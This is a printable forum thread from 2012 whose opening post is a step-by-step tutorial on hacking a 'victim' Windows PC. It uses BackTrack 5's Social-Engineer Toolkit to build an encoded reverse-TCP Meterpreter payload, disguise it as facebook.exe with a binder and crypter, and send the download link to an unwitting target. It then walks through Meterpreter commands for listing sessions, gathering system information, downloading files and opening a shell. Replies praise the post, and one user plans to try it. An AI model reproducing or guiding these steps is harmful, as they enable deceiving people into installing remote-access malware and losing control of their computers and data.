[MegaThread]Hack Victim Windows system by Backtrack 5 - Printable Version

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[MegaThread]Hack Victim Windows system by Backtrack 5 - HrDe - 03-31-2012

Today tutorial basics come from payload, so first thing which come in your mind is
"what is payload?"

[color=#FF4500]A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt.A payload could also be something as simple as a few commands to be executed on the target operating system.

Step 1: Go to Backtrack 5 and open the terminal , i had done it with BackTrack5 R2 , so after starting terminal now write below write command ....

cd /pentest/exploits/set

and then press enter key.Now again type..


again press enter key. For live example see below pic...

[Image: 51.PNG]

Step 2: When you done step 1 then a menu open where he say to select, then you select "Create a Payload and listener" which number in menu 4 so write 4 and press enter key, see below pic....

[Image: 52.PNG]

Step3: Again a menu where some name given here select number 2 which are "Windows Reverse TCP Meterpreter and send back to attacker", write 2 and press Enter Key, see below pic...

[Image: 53.PNG]

Step4: Now Select number 2 which means "shikata_ga_nai(very good)" and press Enter Key, see pic...

[Image: 54.PNG]

Step5: When step 4 completed then it ask About Default Port of the listener so enter any number . I am going to enter 808 , see below pic...

[Image: 55.PNG]

When it ask "Do you want start the listener now ?" then enter "Y" for say yes ,see below pic...

[Image: 57.PNG]

Step6: Now a find create on the Folder set which name "msf.exe" . Now for found that file follow path..

File System>Pentest Folder>Exploits Folder>Set Folder

When you go there you see msf.exe file like below pic...

[Image: 58.PNG]

Step7: Now change this file into any other name like facebook.exe,video.exe,gmail.exe anyone which you want but remember write .exe extension of file, see below pic where i am change into facebook.exe....

[Image: 59.PNG]

Now use Binder and Crypter for this file and attach it with any other file. You can also use my old tutorial...

Because i want to only show you method so i am not bind it. Now upload this file on any free space provider website and send link to Victim, see below pic...

[Image: 60.PNG]

In my case, my victim is my friend Hemant PC , when hemant found my send link and see a software for download then he start downloading when download finish (it takes just 5 second) then my facebook.exe file automatic execute and simultaneously my terminal window show me some lines in which he want to say sessions start.

Step8: When Step 7 completed then for check sessions status run below write command...

sessions -l

when you did it then you see it showing connection...>>>>>>>>

Which means my system IP which default Port 808 now connected with my victim Hemant System which IP is and port 49793 . Now you enter in your victim System, see below pic...

[Image: 61.PNG]

Step9: Congrats!!!!!!!! friends you are successful with me. Now for forward process write command by which you enter in the meterpreter mode ....

sessions -i 1

And Press Enter Key see below pic...

[Image: 62.PNG]

Now we want to find out system information so write.........."sysinfo" and press enter key, see above pic. where you can see...

Computer : HEMANT-PC
OS : Windows 7

and many things.

Step10: Now if you want to find Process list which run in the Victim System at that time then run command...


And Press Enter Key, see below pic in which all running process show you...

[Image: 63.PNG]

For Program List run command ................."ls"................ see below picture....

[Image: 64.PNG]

If you want download any file from Victim system then run command...

>download c:\\windows\\system32\\sethc.exe

And press Enter key, where c:\\windows\\system32\\sethc.exe is file location and name.see below pic...

[Image: 67.PNG]

For Enter in the Shell or Command Prompt of Victim IP run command...


and press enter key, see below pic...

[Image: 68.PNG]


I had Spend 6 hour for make this tutorial for you,but you will spend 1 min for say thanks!

RE: [MileStone Tutorial]Hack Victim Windows OS based system by Backtrack 5 - HrDe - 04-08-2012

I am totally wonder,90+ view but not any reply , hey wht the problem with this post.

RE: [MileStone Tutorial]Hack Victim Windows OS based system by Backtrack 5 - Aph0tic - 04-10-2012

Great thread / Tutorial. Surprised about the amount of the reply's

RE: [MileStone Tutorial]Hack Victim Windows OS based system by Backtrack 5 - HrDe - 04-10-2012

(04-10-2012, 01:20 AM)Aph0tic Wrote: Great thread / Tutorial. Surprised about the amount of the reply's

Thanks bro for like my work done, ya i m also wonder about reply.

RE: [MileStone Tutorial]Hack Victim Windows OS based system by Backtrack 5 - milkbone2001 - 04-14-2012

nice dude, imma try this

RE: [MileStone Tutorial]Hack Victim Windows OS based system by Backtrack 5 - milkbone2001 - 04-14-2012

nice dude, imma try this

RE: [MegaThread]Hack Victim Windows system by Backtrack 5 - HrDe - 04-16-2012

Thanks ,yap try and then tell me ur experiance.

RE: [MegaThread]Hack Victim Windows system by Backtrack 5 - DeonAB - 04-19-2012

wow man you should make an Ebook or ebooks about the backtrack knowledge you got, I never knew how to use backtrack thanks fir teaching me man

RE: [MegaThread]Hack Victim Windows system by Backtrack 5 - HrDe - 04-19-2012

(04-19-2012, 05:13 AM)DeonAB Wrote: wow man you should make an Ebook or ebooks about the backtrack knowledge you got, I never knew how to use backtrack thanks fir teaching me man

Thanks bro for like my work and also for ur advice.I like it in future work on that.

RE: [MegaThread]Hack Victim Windows system by Backtrack 5 - __Dj_-k1ll3r__ - 04-19-2012

thx bro nic tut thx to shear ......